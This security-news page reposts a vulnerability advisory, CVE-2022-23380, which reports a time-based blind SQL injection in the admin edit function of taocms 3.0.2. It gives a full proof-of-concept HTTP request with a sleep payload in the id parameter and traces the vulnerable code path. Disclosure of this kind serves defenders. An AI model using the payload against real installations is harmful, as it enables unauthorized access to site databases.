Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-23380: There is SQL blind injection at "Admin Edit" · Issue #16 · taogogo/taocms

There is a SQL injection vulnerability in the background of taocms 3.0.2 in parameter id:action=admin&id=2&ctrl=edit.

CVE
#sql#vulnerability#web#windows#apple#git

20220116015744

20220116015609

GET /admin/admin.php?action=admin&id=2+and(sleep(5))--+&ctrl=edit HTTP/1.1
Host: taocms.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://taocms.test/admin/admin.php?action=admin&ctrl=lists
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=aa3a5livo36mssl5dqhmf5dc62;XDEBUG_SESSION=PHPSTORM
Connection: close

20220116020627
image

admin/admin.php
20220116015910

include/Model/Admin.php::edit
20220116015937

include/Db/Mysql.php::getlist
20220116020018

include/Db/Mysql.php::query
20220116020037

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907